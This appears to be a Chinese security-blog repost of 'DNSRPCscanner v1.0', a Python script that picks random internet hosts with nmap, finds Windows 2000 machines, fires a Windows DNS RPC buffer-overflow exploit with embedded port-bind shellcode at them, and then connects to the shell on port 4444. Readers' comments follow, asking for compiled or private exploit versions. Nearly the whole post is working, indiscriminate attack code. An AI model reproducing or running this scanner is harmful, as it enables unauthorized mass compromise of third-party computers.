DNSRPCscanner v1.0
鬼仔注:python的版本,我没有测试。配合最近那个DNS的EXP使用。
来源:7jdg's blog
#!/usr/bin/python
#This is a Windows DNS RPC service scanner for the new exploit #http://www.milw0rm.com/exploits/3737, uses nmap to locate win2000 machines
#and if found continues to use the exploit. Threw in a little threading to speed
#the process up. Remove the 2000 and whitespace in between at line 137 to exploit
#all windows machines found. I noticed for this exploit you need impacket for it
#to work properly, http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz
#download that, untar, cd, su root, python setup.py install
#thats it...
#!!! You need to be root for the nmap flags to work properly !!!
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os, StringIO, re, random, commands, sys, time, thread
try:
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
except(ImportError):
print "\nYou need the Impacket Module"
print "http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz\n"
sys.exit(1)
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
# Stub sections taken from metasploit
stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00'
stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00'
stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
stub += '\\A' * 465
# At the time of overflow ESP points into our buffer which has each char
# prepended by a '\' and our shellcode code is about 24+ bytes away from
# where EDX points
stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode
stub += '\\B' * 43
# Translates to 'jmp EDX'
stub += '\\\xff\\\xe2'
stub += '\\A' * 134
stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00'
stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
stub += shellcode
def timer():
now = time.localtime(time.time())
return time.asctime(now)
# Code ripped from core security document on impacket
# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
handle = '\x00'*20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)
print '[-] Could not locate DNS port; Target might not be running DNS'
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))
dce.call(0x01, stub)
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def Worker():
global num
global found
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -T 3 -O --host-timeout 35s --osscan-guess -iR 1')[1]).readlines() #Change your nmap flags if needed
for tmp in nmap:
if re.search("QUITTING!",tmp):
print '[-] You must run this script as root for the nmap flags to work properly!!!'
print 'Type: Ctrl-C\n'
sys.exit(1)
ip = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ip:
target = ip[0]
print "Searching:",target
for tmp in nmap:
if re.search("Aggressive OS guesses:", tmp):
os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","")
if os:
os = re.sub(r'\(\d+%\)',"",os,1)
print "\tFound:",os
num +=1
if re.search("Windows 2000",os): #Take out the 2000 to exploit all windows found machines
found.append(target+" : "+os)
print "\tFound a Win2000 machine:",os
print '\n[+] Locating DNS RPC port'
port = DiscoverDNSport(target)
print '[+] Located DNS RPC service on TCP port: %d' % port
ExploitDNS(target, port)
print '[+] Exploit sent. Connecting to shell in 3 seconds'
time.sleep(3)
ConnectRemoteShell(target)
if len(sys.argv) != 2:
print "\n\t d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0"
print "\t--------------------------------------------------"
print "\n\tUsage: ./DNSRPCscanner.py <How many would you like to scan?>\n"
print "\tEx. ./DNSRPCscanner.py 10000\n"
sys.exit(1)
else:
print "\n d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0"
print "--------------------------------------------------"
print "[+] Scanning: 0day Windows DNS RPC service vulnerability"
print "[+] Targets:",int(sys.argv[1])
print "[+] Starting:",timer(),"\n"
print "[+] Scanning...\n"
found = []
num = 0
for x in range(10):
for i in range(int(sys.argv[1])/10):
time.sleep(random.randint(1, 3))
work = thread.start_new_thread(Worker, ())
print "\n[-] Scanning Complete:",timer()
print "[-] Found:",num,"o-systems"
print "[-] Found:",len(found),"using win2k\n"
if len(found) >=1:
print "[-] Target List:\n"
for os in found:
print os
那个EXP到底是本地提权还是远程溢出?没看懂!-_-!
昨天晚上我就在想如何编译,还有就是似乎有人拥有DNS中文版本的EXP!真是羡慕。
老大把远程的发出来啊~
现在发的就是远程的
老大:
可是像我们这样的菜菜不会编译啊,有没有编译好的?谢谢
你测试能得到shell吗?
呵呵,我有另外一个版本的。
本地和远程应该都可以,不过我只测试过远程的
那个版本朋友给的,没办法放出来。
老大: 你一般什么时候在线啊?看你Q都离线的?
编译好的?嘿嘿,百度知道,搜索下嘛
我没有测试那个版本的
另外一个版本让我们这菜菜也测试下好不好
9位的那个QQ?很少上了,上也是都隐身。